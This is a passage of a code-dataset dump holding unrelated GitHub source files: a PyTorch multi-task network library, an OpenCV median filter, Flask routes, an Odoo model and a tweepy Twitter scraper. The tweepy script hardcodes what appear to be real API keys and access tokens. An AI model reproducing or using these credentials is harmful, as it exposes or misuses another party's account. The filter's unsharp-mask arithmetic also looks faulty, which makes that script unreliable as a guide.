k, v in serialized_controller.items():\n setattr(self, k, v)\n return self\n\n\nclass BatchNormPillow(nn.Module):\n \"\"\"\n Customized Batch Normalization, for which we can access the inner\n representation (pre-affine).\n\n Attributes:\n raw_bn: an instance of `nn.BatchNorm_`, with `affine=False`\n weight, bias: gamma and beta coefficients (learnable)\n rep: inner representation (saved if retain_rep is True)\n retain_rep: whether to retain the result of raw_bn\n \"\"\"\n def __init__(self, channels, bn_type='2d'):\n super().__init__()\n if bn_type == '1d':\n self.raw_bn = nn.BatchNorm1d(channels, affine=False)\n elif bn_type == '2d':\n self.raw_bn = nn.BatchNorm2d(channels, affine=False)\n else:\n raise 
RuntimeError('Only 1D and 2D BN-Pillow are supported')\n\n self.weight = nn.Parameter(torch.empty((channels,)).uniform_())\n self.bias = nn.Parameter(torch.zeros((channels,)))\n self.rep = None\n self.retain_rep = False\n\n def forward(self, x):\n x = self.raw_bn(x)\n if self.retain_rep:\n self.rep = x\n y = torch.transpose(x, 1, -1) * self.weight + self.bias\n return torch.transpose(y, 1, -1)\n\n\nclass Block(nn.Module):\n \"\"\"\n A wrapper around `nn.Module` that holds convenient parameters for the\n Hydra class that would otherwise be hard to access or would require\n extra bookkeeping.\n\n Attributes:\n module: an `nn.Module` that we will wrap this around\n with_bn_pillow: whether to put a batch-normalization layer after\n bn_pillow: the batchnorm layer mentioned, created in runtime\n trainable: DO NOT confuse with nn.Module.training (module state)\n \"\"\"\n def __init__(self,\n module,\n bn_pillow_planes=None,\n bn_pillow_type='2d'):\n super().__init__()\n self.add_module('module', module)\n self.trainable = True\n if bn_pillow_planes is not None:\n self.with_bn_pillow = True\n bn_pillow = BatchNormPillow(bn_pillow_planes, bn_pillow_type)\n self.add_module('bn_pillow', bn_pillow)\n else:\n self.with_bn_pillow = False\n\n def forward(self, x, *args, **kwargs):\n y = self.module.forward(x, *args, **kwargs)\n if self.with_bn_pillow:\n if not hasattr(self, 'bn_pillow'):\n pillow_type = '2d' if len(y.shape) == 4 else '1d'\n bn_pillow = BatchNormPillow(y.shape[1], pillow_type)\n device = next(self.module.parameters()).device\n bn_pillow = bn_pillow.to(device)\n self.add_module('bn_pillow', bn_pillow)\n if self.training:\n self.bn_pillow.train()\n else:\n self.bn_pillow.eval()\n return self.bn_pillow.forward(y)\n return y\n\n\nclass Hydra(nn.Module):\n \"\"\"\n A base class for all Multi-Task Neural Networks with hard-shared\n parameters and arbitrary branching schema.\n\n Attributes:\n blocks: a `nn.ModuleList` of building blocks of Hydra\n controllers: a list of controllers accompanying each block\n heads: dictionary {task_id: index} of Hydra's heads\n rep_tensors: stores the tensors at branching points\n branching_points: indices of blocks with more than one child\n \"\"\"\n def __init__(self):\n super().__init__()\n self.blocks = nn.ModuleList()\n self.controllers = list()\n self.heads = dict()\n self.rep_tensors = dict()\n self.branching_points = set()\n\n def add_block(self, module):\n \"\"\"\n Registers a new Hydra block, automatically adds it to the\n self.blocks and the execution graph.\n\n Args:\n module: a `nn.Module` object\n\n Returns:\n a Controller object for newly added block\n \"\"\"\n new_index = len(self.blocks)\n new_controller = Controller(new_index)\n self.blocks.append(module)\n self.controllers.append(new_controller)\n return new_controller\n\n def add_head(self, module, task_id):\n \"\"\"\n Registers a new Hydra block as a \"Head\". 
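# ---------------------------------------------------------------------------
# Editor's sketch: minimal usage of the BatchNormPillow defined above. It
# normalizes with a non-affine BatchNorm, optionally retains that pre-affine
# representation, then applies its own learnable gamma/beta. The tensor shape
# below is an illustrative assumption.
import torch

bn = BatchNormPillow(channels=3, bn_type='2d')
bn.retain_rep = True
x = torch.randn(4, 3, 8, 8)   # (batch, channels, height, width)
y = bn(x)
assert y.shape == x.shape
assert bn.rep is not None     # the pre-affine activations were retained
# ---------------------------------------------------------------------------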
Same as the method\n `add_block()`, but adds the controller to self.heads.\n\n Args:\n module: a `nn.Module` object\n task_id: an identifier of the task that the head is solving\n\n Returns:\n a Controller object for newly added block\n \"\"\"\n new_controller = self.add_block(module)\n new_controller.task_id = task_id\n self.heads[task_id] = new_controller.index\n return new_controller\n\n def extra_repr(self):\n \"\"\"\n To be displayed each time one calls `repr()`, together with\n the default output of `nn.Module`.\n \"\"\"\n items = '\\n '.join(str(c) for c in self.controllers)\n controllers = '(block controllers):\\n ' + items\n items = '\\n '.join(\n '({}) -> {}'.format(k, str(c))\n for k, c in self.heads.items())\n heads = '(heads):\\n ' + items\n return controllers + '\\n' + heads\n\n def execution_plan(self, task_ids):\n \"\"\"\n Dynamically constructs an execution plan, given the identifiers\n of tasks that we want to perform.\n\n Args:\n task_ids: an identifier, or list of identifiers of tasks\n\n Returns:\n execution_order: a list of indices of modules to be executed\n branching_ids: indices of branching points\n \"\"\"\n if not isinstance(task_ids, list):\n task_ids = [task_ids]\n execution_order = []\n branching_ids = set()\n for task_id in task_ids:\n branching_point = None\n controller = self.controllers[self.heads[task_id]]\n task_exec_chain = controller.execution_chain\n for i, index in enumerate(task_exec_chain):\n if index not in execution_order:\n break\n branching_point = index\n execution_order += task_exec_chain[i:].copy()\n if branching_point is not None:\n branching_ids.add(branching_point)\n return execution_order, branching_ids\n\n def parameters(self,\n recurse=True,\n task_ids=None,\n only_trainable=False):\n \"\"\"\n Returns an iterator over module parameters. If task_ids\n are specified, returns an iterator only over the parameters\n that affect the outputs on those tasks.\n\n Args:\n recurse: whether to yield the parameters of submodules\n task_ids: whether to yield only task-related parameters\n only_trainable: whether to yield only trainable parameters\n\n Yields:\n Parameter: module parameter\n \"\"\"\n if task_ids is None and not only_trainable:\n for param in super().parameters(recurse):\n yield param\n else:\n if task_ids is None:\n task_ids = list(self.heads.keys())\n execution_order, _ = self.execution_plan(task_ids)\n for index in execution_order:\n if only_trainable:\n if not hasattr(self.blocks[index], 'trainable'):\n continue\n if self.blocks[index].trainable is not True:\n continue\n\n for param in self.blocks[index].parameters():\n yield param\n\n def control_blocks(self, task_ids=None):\n \"\"\"\n Yields an iterator over the blocks. If `task_ids` are specified,\n only blocks flowing towards corresponding heads will be yielded.\n \"\"\"\n if task_ids is None:\n for controller, block in zip(self.controllers, self.blocks):\n yield controller, block\n else:\n execution_order, _ = self.execution_plan(task_ids)\n for index in execution_order:\n yield self.controllers[index], self.blocks[index]\n\n def create_branch(self, index, branches, device=None):\n \"\"\"\n Dynamically clones `self.blocks[index]`, and stacks the branches\n specified by `branches` on top of the newly cloned branch.\n\n [Before] [After]\n __ ........... 
-------O--- ...........\n index / / index\n --O-------O--- branches[0] --O __ branches[0]\n \\__ \\ clone /\n branches[1] -------O--- branches[1]\n\n Args:\n index: index of the block to clone\n branches: indices of block's children to stack on the clone\n device: device to spawn the clone on, can be decided later\n\n Raises:\n ValueError: in case invalid `index` or `branches` are specified\n\n Returns:\n controller: controller object of the newly created branch\n block: module of the newly created branch\n \"\"\"\n if index in self.heads:\n raise ValueError(\"Cannot split Hydra's head.\")\n controller = self.controllers[index]\n for b in branches:\n if b not in controller.children_indices:\n raise ValueError(\"Indices of branches should be in \"\n \"controller's children_indices.\")\n are_equal = True\n for b in controller.children_indices:\n if b not in branches:\n are_equal = False\n if are_equal:\n return self.controllers[index], self.blocks[index]\n\n block = self.blocks[index]\n cloned_block = deepcopy(block)\n if device is not None:\n cloned_block = cloned_block.to(device)\n cloned_controller = deepcopy(controller)\n new_index = len(self.controllers)\n cloned_controller.index = new_index\n self.blocks.append(cloned_block)\n self.controllers.append(cloned_controller)\n\n if cloned_controller.parent_index is not None:\n parent = self.controllers[cloned_controller.parent_index]\n parent.children_indices.append(new_index)\n cloned_controller.execution_chain = [\n i if i != index else new_index\n for i in cloned_controller.execution_chain]\n\n controller_deque = deque()\n controller_deque.extend(branches)\n while len(controller_deque) > 0:\n tmp_index = controller_deque.popleft()\n tmp_controller = self.controllers[tmp_index]\n if tmp_controller.parent_index == index:\n tmp_controller.parent_index = new_index\n tmp_controller.execution_chain = [\n i if i != index else new_index\n for i in tmp_controller.execution_chain]\n controller_deque.extend(tmp_controller.children_indices)\n\n controller.children_indices = [\n i for i in controller.children_indices\n if i not in branches]\n cloned_controller.children_indices = branches\n\n controller.serving_tasks = dict()\n for i in controller.children_indices:\n tmp_controller = self.controllers[i]\n controller.serving_tasks.update(\n tmp_controller.serving_tasks)\n cloned_controller.serving_tasks = dict()\n for i in cloned_controller.children_indices:\n tmp_controller = self.controllers[i]\n cloned_controller.serving_tasks.update(\n tmp_controller.serving_tasks)\n\n self.rep_tensors.clear()\n _, self.branching_points = \\\n self.execution_plan(list(self.heads.keys()))\n\n return cloned_controller, cloned_block\n\n def split(self, index, branching_scheme, device):\n \"\"\"\n Splits a Hydra's block into several blocks, according to the\n `branching_scheme`. 
Results of `split(0, [[1], [2,3], [4,5]])`:\n\n | B | (1) (2) (3) (4) (5) | A | (1) (2) (3) (4) (5)\n | E | | | | | | | F | | | | | |\n | F | +---+---|---+---+ | T | | |---+ |---+\n | O | (0) | E | (0) (6) (7)\n | R | | | R | | | |\n | E | (*) | | (*)--+-------+\n\n Args:\n index: index of the block to split\n branching_scheme: list of list of indices (as example above)\n device: a device to spawn the new branches on\n\n Raises:\n ValueError: in case invalid parameters are specified\n\n Returns:\n controllers: list of controllers of split branches\n blocks: list of blocks - the split branches\n \"\"\"\n if index not in self.branching_points:\n raise ValueError(\"You can only split layers which indices \"\n \"are in `Hydra.branching_points`.\")\n\n controller = self.controllers[index]\n block = self.blocks[index]\n\n total_branches = set()\n for branch in branching_scheme:\n total_branches.update(set(branch))\n if not total_branches == set(controller.children_indices):\n raise ValueError(\"The union of the branches should be \"\n \"equal to `controller.children_indices`.\")\n\n for i in range(len(branching_scheme)):\n scheme_a = set(branching_scheme[i])\n for j in range(i + 1, len(branching_scheme)):\n scheme_b = set(branching_scheme[j])\n if not scheme_a.isdisjoint(scheme_b):\n raise ValueError(\"The branching schemes should \"\n \"be disjoint to each other.\")\n\n new_controllers, new_blocks = [controller], [block]\n for branch in branching_scheme[1:]:\n tmp_ctrl, tmp_block = self.create_branch(index, branch, device)\n new_controllers.append(tmp_ctrl)\n new_blocks.append(tmp_block)\n return new_controllers, new_blocks\n\n def rip(self, device):\n \"\"\"\n Violently rips the model apart. Below are some example results:\n\n | B | (x) (y) (z) | A | (x) (y) (z)\n | E | | | | | F | | | |\n | F | +--(a) (b) | T | (a) (e) (b)\n | O | | | | E | | | |\n | R | +--(c) | R | +--(c) (d)\n | E | | | | | |\n | | (*) | | +--(*)\n\n Args:\n device: a device to spawn the new branches on, either CPU or GPU\n\n Returns:\n a dict of lists of tuples {index: [(new_index, children_index)]}\n \"\"\"\n indices = list(self.branching_points)\n indices.sort(key=lambda i: len(self.controllers[i].execution_chain))\n\n index_map = dict()\n for index in indices:\n children_indices = self.controllers[index].children_indices\n branching_scheme = [[i] for i in children_indices]\n new_cs, _ = self.split(index, branching_scheme, device)\n index_map[index] = [\n (c.index, i) for c, i in zip(new_cs, children_indices)]\n return index_map\n\n def peel(self, task_ids, device=None):\n \"\"\"\n Peels off a task-specific subnetwork (like a banana). Please note\n that it does NOT copy the parameters of the `__init__` of your\n network, inherited from Hydra. 
Results of peel('task_a'):\n\n | O | (task_a) (task_b) | P | (task_a)\n | R | | | | E | |\n | I | +----+----+ | E | +----+\n | G | (0) | L | (0)\n | I | | | E | |\n | N | (*) | D | (*)\n\n Args:\n task_ids: `str` or `list` of `str`, related subnets are peeled\n device: a device to spawn freshly peeled Hydra on\n\n Returns:\n peeled_hydra: A new Hydra that is only related to specified tasks.\n index_map: a dict {old_index: new_index} of block correspondence\n \"\"\"\n execution_order, _ = self.execution_plan(task_ids)\n index_map = dict((idx, i) for i, idx in enumerate(execution_order))\n\n new_hydra = Hydra()\n for index in execution_order:\n controller = self.controllers[index]\n block = self.blocks[index]\n\n new_block = deepcopy(block)\n if device is not None:\n new_block = new_block.to(device)\n if controller.task_id is not None:\n new_hydra.add_head(new_block, controller.task_id)\n else:\n new_hydra.add_block(new_block)\n\n for index in execution_order:\n new_index = index_map[index]\n controller = self.controllers[index]\n new_controller = new_hydra.controllers[new_index]\n\n parent_index = controller.parent_index\n if parent_index is not None:\n new_parent_index = index_map[parent_index]\n new_parent = new_hydra.controllers[new_parent_index]\n new_controller.stack_on(new_parent)\n\n new_hydra.build()\n return new_hydra, index_map\n\n def build(self):\n \"\"\"\n Builds the model. Calculates additional stuff to make the Hydra\n truly powerful.\n \"\"\"\n for _, head_index in self.heads.items():\n controller = self.controllers[head_index]\n task_id = controller.task_id\n for index in controller.execution_chain:\n idx = len(self.controllers[index].serving_tasks)\n self.controllers[index].serving_tasks[task_id] = idx\n _, self.branching_points = \\\n self.execution_plan(list(self.heads.keys()))\n\n def forward(self,\n input_tensor,\n task_ids,\n retain_tensors=False,\n retain_all=False):\n \"\"\"\n Defines the computation performed at every call. 
Dynamically\n and automatically decides what to run and in what order.\n\n Args:\n input_tensor: a common input for specified tasks\n task_ids: identifiers of tasks to be executed\n retain_tensors: if True, save branching tensors to rep_tensors\n retain_all: if True, save ALL tensors at rep_tensors\n\n Returns:\n A dictionary {task_id: output} of task-specific outputs\n \"\"\"\n exec_order, branching_ids = self.execution_plan(task_ids)\n x = input_tensor\n outputs = dict()\n for index in exec_order:\n controller = self.controllers[index]\n parent_index = controller.parent_index\n if parent_index not in branching_ids:\n x = self.blocks[index](x)\n else:\n x = self.blocks[index](self.rep_tensors[parent_index])\n\n if retain_all:\n self.rep_tensors[index] = x\n elif retain_tensors and index in self.branching_points:\n self.rep_tensors[index] = x\n elif index in branching_ids:\n self.rep_tensors[index] = x\n\n if controller.task_id is not None:\n outputs[controller.task_id] = x\n\n if isinstance(task_ids, str):\n return outputs[task_ids]\n return outputs\n\n def serialize(self):\n \"\"\"Serializes the Hydra into dictionary objects.\n\n Returns:\n hydra_serialization: a dictionary of Hydra's parameters\n state_dict: a state dict of `nn.Module` object\n \"\"\"\n controller_serializations = [\n c.serialize() for c in self.controllers]\n hydra_serialization = {\n 'controllers': controller_serializations,\n 'heads': self.heads\n }\n return hydra_serialization, self.state_dict()\n\n def deserialize(self, hydra_serialization, state_dict):\n \"\"\"Reads the Hydra from its serialized representation.\n\n Args:\n hydra_serialization: a dictionary of Hydra's parameters\n state_dict: a state dict of `nn.Module` object\n\n Returns: self\n \"\"\"\n self.controllers = [\n Controller().deserialize(c)\n for c in hydra_serialization['controllers']\n ]\n self.heads = hydra_serialization['heads']\n self.load_state_dict(state_dict)\n return self\n\n def save(self, basepath):\n \"\"\"\n Saves the Hydra to disk. The hydra will be saved in two parts:\n * basepath.yaml -- stores the Hydra's controllers and heads\n * basepath.pth -- stores the Hydra's weights\n\n Args:\n basepath: a full path to file (without extension) to save to\n \"\"\"\n serialized_hydra, state_dict = self.serialize()\n basepath = os.path.expanduser(basepath)\n yaml_path = basepath + '.yaml'\n with open(yaml_path, 'w') as outfile:\n yaml.dump(serialized_hydra, outfile)\n pth_path = basepath + '.pth'\n torch.save(state_dict, pth_path)\n\n def load(self, basepath):\n \"\"\"\n Loads the Hydra from disk. 
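# ---------------------------------------------------------------------------
# Editor's sketch: assembling and running a tiny Hydra with a shared stem and
# two task heads, using only the API defined above. Layer sizes and task ids
# are illustrative assumptions.
import torch
import torch.nn as nn

hydra = Hydra()
stem = hydra.add_block(Block(nn.Linear(8, 16)))
hydra.add_head(Block(nn.Linear(16, 2)), task_id='a').stack_on(stem)
hydra.add_head(Block(nn.Linear(16, 3)), task_id='b').stack_on(stem)
hydra.build()

# One shared forward pass through the stem, then both heads; the stem output
# is cached in rep_tensors because it is a branching point.
out = hydra(torch.randn(5, 8), task_ids=['a', 'b'])
print(out['a'].shape, out['b'].shape)  # torch.Size([5, 2]) torch.Size([5, 3])
# ---------------------------------------------------------------------------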
This will try to find two files:\n * basepath.yaml -- for the Hydra's controllers and heads\n * basepath.pth -- for the Hydra's weights\n\n Returns: self\n \"\"\"\n basepath = os.path.expanduser(basepath)\n yaml_path = basepath + '.yaml'\n with open(yaml_path, 'r') as stream:\n serialized_hydra = yaml.safe_load(stream)\n pth_path = basepath + '.pth'\n state_dict = torch.load(pth_path)\n return self.deserialize(serialized_hydra, state_dict)\n","repo_name":"hav4ik/Hydra","sub_path":"src/models/hydra_base.py","file_name":"hydra_base.py","file_ext":"py","file_size_in_byte":23804,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"37"}
+{"seq_id":"27832016041","text":"import numpy as np\nimport cv2 as cv\n\nimg_name = input(\"Please enter the image you want to process with the median filter : \")\nimg_color = cv.imread(img_name)\ncv.imwrite('ColorImage_' + img_name + '.jpg', img_color)\nimg_gray = cv.cvtColor(img_color, cv.COLOR_BGR2GRAY)\ncv.imwrite('GrayImage_' + img_name + '.jpg', img_gray)\n\nimg_row_size, img_col_size = img_gray.shape\nmedian_color = np.zeros((img_row_size, img_col_size, 3))\nmedian_gray = np.zeros((img_row_size, img_col_size))\nunsharp_color = np.zeros((img_row_size, img_col_size, 3))\nunsharp_gray = np.zeros((img_row_size, img_col_size))\n\nfor i in range(1, img_row_size-1):\n for j in range(1, img_col_size-1):\n sort_pixel_gray = [img_gray[i-1][j-1], img_gray[i-1][j], img_gray[i-1][j+1], img_gray[i][j-1],\n img_gray[i][j], img_gray[i][j+1], img_gray[i+1][j-1], img_gray[i+1][j], img_gray[i+1][j+1]]\n sort_pixel_gray = sorted(sort_pixel_gray)\n median_gray[i][j] = sort_pixel_gray[4]\n unsharp_gray[i][j] = img_gray[i][j] - median_gray[i][j]/255\n\n sort_pixel_r = [img_color[i-1][j-1][0], img_color[i-1][j][0], img_color[i-1][j+1][0], img_color[i][j-1][0],\n img_color[i][j][0], img_color[i][j+1][0], img_color[i+1][j-1][0], img_color[i+1][j][0], img_color[i+1][j+1][0]]\n sort_pixel_g = [img_color[i-1][j-1][1], img_color[i-1][j][1], img_color[i-1][j+1][1], img_color[i][j-1][1],\n img_color[i][j][1], img_color[i][j+1][1], img_color[i+1][j-1][1], img_color[i+1][j][1], img_color[i+1][j+1][1]]\n sort_pixel_b = [img_color[i-1][j-1][2], img_color[i-1][j][2], img_color[i-1][j+1][2], img_color[i][j-1][2],\n img_color[i][j][2], img_color[i][j+1][2], img_color[i+1][j-1][2], img_color[i+1][j][2], img_color[i+1][j+1][2]]\n sort_pixel_r = sorted(sort_pixel_r)\n sort_pixel_g = sorted(sort_pixel_g)\n sort_pixel_b = sorted(sort_pixel_b)\n median_color[i][j][0] = sort_pixel_r[4]\n median_color[i][j][1] = sort_pixel_g[4]\n median_color[i][j][2] = sort_pixel_b[4]\n unsharp_color[i][j][0] = img_color[i][j][0] - median_color[i][j][0]/255\n unsharp_color[i][j][1] = img_color[i][j][1] - median_color[i][j][1]/255\n unsharp_color[i][j][2] = img_color[i][j][2] - median_color[i][j][2]/255\n\n\nmedian_gray = median_gray.astype(np.uint8)\ncv.imwrite('GrayImageMadeByMedianFilter_' + img_name + '.jpg', median_gray)\nmedian_color = median_color.astype(np.uint8)\ncv.imwrite('ColorImageMadeByMedianFilter_' + img_name + '.jpg', median_color)\n\nunsharp_gray = unsharp_gray.astype(np.uint8)\ncv.imwrite('GrayImageMadeByMedianFilterUnsharped_' +\n img_name + '.jpg', unsharp_gray)\nunsharp_color = unsharp_color.astype(np.uint8)\ncv.imwrite('ColorImageMadeByMedianFilterUnsharped_' +\n img_name + '.jpg', unsharp_color)\n\ncv.imshow(\"Original Color Image\", img_color)\ncv.imshow(\"Original Gray Image\", img_gray)\ncv.imshow(\"Color Image Made By Median Filter\", 
median_color)\ncv.imshow(\"Gray Image Made By Median Filter\", median_gray)\ncv.imshow(\"Color Image Made By Median Filter & Unsharped\", unsharp_color)\ncv.imshow(\"Gray Image Made By Median Filter & Unsharped\", unsharp_gray)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"Lyc1103/Image-Processing_Median-Filter","sub_path":"MedianFilter.py","file_name":"MedianFilter.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29033574478","text":"from flask_login import login_required, current_user\nimport sqlalchemy\nfrom flask import render_template, redirect, url_for, flash, request, current_app\n\nfrom app.models import StudentDetails, CourseworkInstance, Coursework\nfrom app.decorators import permission_required, role_required\nfrom app.student import bp\nfrom app.student.forms import StudentDetailsForm\nfrom app import db\n\n\n@bp.route('/main')\n@login_required\ndef student_main_page():\n return render_template('student/main.html')\n\n@bp.route('/details', methods = ['GET', 'POST'])\n@login_required\n@role_required('Student')\ndef get_student_details():\n form = StudentDetailsForm()\n \n student_details = StudentDetails.query.filter_by(user_id = current_user.id).first()\n\n if form.validate_on_submit():\n student_details = StudentDetails.query.filter_by(first_name = form.first_name.data, last_name = form.last_name.data).first()\n if student_details is None: \n student_details = StudentDetails(first_name = form.first_name.data, last_name = form.last_name.data, \n address = form.address.data, city = form.city.data, state = form.state.data,\n zip = form.zip.data, parent_name = form.parent_name.data, emergency_contact = form.emergency_contact.data,\n medical_conditions = form.medical_conditions.data, comments = form.comments.data, user_id=current_user.id)\n else:\n student_details.address = form.address.data\n student_details.city = form.city.data\n student_details.state = form.state.data\n student_details.zip = form.zip.data\n student_details.parent_name = form.parent_name.data\n student_details.emergency_contact = form.emergency_contact.data\n student_details.medical_conditions = form.medical_conditions.data\n student_details.comments = form.comments.data\n student_details.user_id = current_user.id\n\n db.session.add(student_details)\n db.session.commit()\n\n flash('Student Details entered successfully')\n\n return redirect(url_for('student.student_main_page'))\n if student_details is not None:\n form.first_name.data = student_details.first_name\n form.last_name.data = student_details.last_name\n form.address.data = student_details.address\n form.city.data = student_details.city\n form.state.data = student_details.state\n form.zip.data = student_details.zip\n form.parent_name.data = student_details.parent_name\n form.emergency_contact.data = student_details.emergency_contact\n form.medical_conditions.data = student_details.medical_conditions\n form.comments.data = student_details.comments\n \n\n return render_template('student/details.html', title='Enter Details',\n form=form)\n\n\n\n@bp.route('/grades', methods = ['GET'])\n@login_required\n@role_required('Student')\ndef get_student_grades():\n page = request.args.get('page', 1, type=int)\n coursework_items = CourseworkInstance.query.filter_by(student_id = current_user.id).paginate(\n page, current_app.config['CARDS_PER_PAGE'], False\n )\n \n next_url = url_for('student.get_student_grades', page=coursework_items.next_num) if 
coursework_items.has_next else None\n prev_url = url_for('student.get_student_grades', page=coursework_items.prev_num) if coursework_items.has_prev else None\n \n for item in coursework_items.items:\n print(item.coursework.name, item.coursework.classroom.name, item.value)\n\n return render_template('student/list_grades.html', title=f'Student - {current_user.username}',\n coursework_items=coursework_items.items, next_url=next_url,\n prev_url=prev_url)\n \n \n\n","repo_name":"Mega-Barrel/CUNY-Hackathon","sub_path":"app/student/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"36402234830","text":"from typing import Any, Dict\n\n\nclass Response:\n def __init__(\n self,\n version: str,\n result: str = 'OK'\n ):\n self.version = version\n self.result = result\n self.output = {}\n self.directives = []\n\n def set_output(self, key, value):\n self.output[key] = value\n\n def remove_output(self, key):\n del self.output[key]\n\n def get_output(self, key):\n return self.output[key]\n\n def to_dict(self) -> Dict[str, Any]:\n response = {\n \"version\": self.version,\n \"resultCode\": self.result,\n \"output\": self.output\n }\n if self.directives:\n response['directives'] = self.directives\n return response\n","repo_name":"gunyu1019/myschool","sub_path":"app/models/nugu/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"29167310360","text":"import json\r\nimport tweepy\r\nimport pandas as pd\r\n\r\n# load key\r\nconsumer_key = \"OA4CTZkyLwMOg08PlFt0goCNC\"\r\nconsumer_secret = \"8k59TeAGeqlHXjf4wjOjrKLYXpEvutuRgDjLxVxm5R7uC5wB0q\"\r\naccess_token = \"1177285260242874368-QoMZGUj2TsbkXyPQ5o0pu5iFrFT72q\"\r\naccess_token_secret = \"6JWjo6Ro4RmqIBFLjOop9QW1FCgHZltRTz8EIsj9UiMOE\"\r\nbearer_token = \"AAAAAAAAAAAAAAAAAAAAAISeXgEAAAAANwEgP0gtkLS%2Bjv9qCa3pIB3o1xs%3D98KYFXJI2DYHslg3StyrI2h9aB0w8PYq8iJyGS6Vdwsrhgkt7r\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key,consumer_secret)\r\nauth.set_access_token(access_token,access_token_secret)\r\n\r\napi = tweepy.API(auth)\r\n# a function to collect a user's recent tweets and related statistics\r\ndef truth(userid):\r\n tweets=api.user_timeline(user_id=userid,count=50,tweet_mode='extended') \r\n text=[]\r\n location=[]\r\n friends_count=[]\r\n followers_count=[]\r\n screen_name=[]\r\n retweet_count=[]\r\n favorite_count=[]\r\n description=[]\r\n# store what we need in lists \r\n for tweet in tweets:\r\n text.append(tweet._json['full_text'])\r\n location.append(tweet._json[\"user\"][\"location\"])\r\n friends_count.append(tweet._json[\"user\"][\"friends_count\"])\r\n followers_count.append(tweet._json[\"user\"][\"followers_count\"])\r\n screen_name.append(tweet._json[\"user\"][\"screen_name\"])\r\n description.append(tweet._json[\"user\"][\"description\"])\r\n retweet_count.append(tweet._json['retweet_count'])\r\n favorite_count.append(tweet._json['favorite_count'])\r\n# transform the lists into a dictionary\r\n dic={\"text\":text,\"location\":location,\"friends_count\":friends_count,\"followers_count\":followers_count,\"screen_name\":screen_name,\"retweet_count\":retweet_count,\"favorite_count\":favorite_count,\"description\":description}\r\n df=pd.DataFrame(dic)\r\n return(df)\r\ndf=truth(1367531)\r\n\r\nfor i 
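# ---------------------------------------------------------------------------
# Editor's sketch: minimal usage of the Response model above; the version and
# output values are illustrative. Note that to_dict() only attaches the
# 'directives' key when the list is non-empty.
resp = Response(version='1.0')
resp.set_output('answer', 'hello')
print(resp.to_dict())
# {'version': '1.0', 'resultCode': 'OK', 'output': {'answer': 'hello'}}
# ---------------------------------------------------------------------------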
in[5402612,15012486,1120655269,380648579,86141342,7309052,15679641,10433782,6577642]:\r\n df=pd.concat([df, truth(i)])\r\n\r\ndf.to_csv(r\"C:\\Windows\\System32\\anly-501-project-FlynnFlag\\data\\00-raw-data\\truth.csv\")\r\n\r\n","repo_name":"anly501/anly-501-project-FlynnFlag","sub_path":"codes/01-data-gathering/real_word_examples_python_api.py","file_name":"real_word_examples_python_api.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26086603997","text":"from loguru import logger\n\n\nclass ComponentManager:\n\n _components = []\n\n @classmethod\n def register(cls, component):\n if component in cls._components:\n return\n cls._components.append(component)\n logger.debug(f'Registered component {component} ({component.__module__})')\n\n @classmethod\n def all(cls):\n return [o() for o in cls._components]\n\n @classmethod\n def get(cls, name):\n for component in cls._components:\n if component.__name__ == name:\n return component()\n raise ValueError(f'Component {name} not found.')","repo_name":"robswc/stratis","sub_path":"app/components/manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"70279142507","text":"from odoo import api, fields, models\n\n\nclass HelpdeskTicket(models.Model):\n\n _inherit = \"helpdesk.ticket\"\n\n project_id = fields.Many2one(string=\"Project\", comodel_name=\"project.project\")\n task_id = fields.Many2one(\n string=\"Task\",\n comodel_name=\"project.task\",\n compute=\"_compute_task_id\",\n readonly=False,\n store=True,\n )\n\n @api.depends(\"project_id\")\n def _compute_task_id(self):\n for record in self:\n if record.task_id.project_id != record.project_id:\n record.task_id = False\n","repo_name":"OCA/helpdesk","sub_path":"helpdesk_mgmt_project/models/helpdesk_ticket.py","file_name":"helpdesk_ticket.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"37"} +{"seq_id":"35767297991","text":"from transformers import T5Tokenizer, T5ForConditionalGeneration\nimport transformers\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom transformers import BertTokenizer, BertForSequenceClassification\nfrom sentence_transformers import SentenceTransformer\n\nimport json\nfrom transformers import Adafactor\nimport torch\nimport torch.optim as optim\nimport pickle\nimport torch.nn as nn\nimport random\nimport torch.nn.functional as F\nfrom collections import Counter\n\nfrom openprompt.plms import load_plm\nfrom openprompt import PromptDataLoader\nfrom openprompt.prompts.prefix_tuning_template import PrefixTuningTemplate\nfrom openprompt.prompts.prefix_tuning_template_env4 import PrefixTuningTemplate1\nfrom openprompt.prompts.prefix_state import PrefixState\nfrom openprompt import PromptForGeneration, PromptForGeneration1\nfrom openprompt.data_utils.utils import InputExample\n\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument('--test_file',type=str,default=None)\nparser.add_argument('--model_name',type=str,default='t5-base')\nparser.add_argument(\"--plm_eval_mode\", action=\"store_true\")\nparser.add_argument('--store',type=str,default=None)\nparser.add_argument('--num_token', type = int, default = 
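# ---------------------------------------------------------------------------
# Editor's sketch: minimal usage of the ComponentManager registry above. The
# Strategy class is an illustrative stand-in for whatever components the
# project registers; get() instantiates a registered component by class name.
class Strategy:
    pass

ComponentManager.register(Strategy)
instance = ComponentManager.get('Strategy')
print(type(instance).__name__)  # Strategy
# ---------------------------------------------------------------------------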
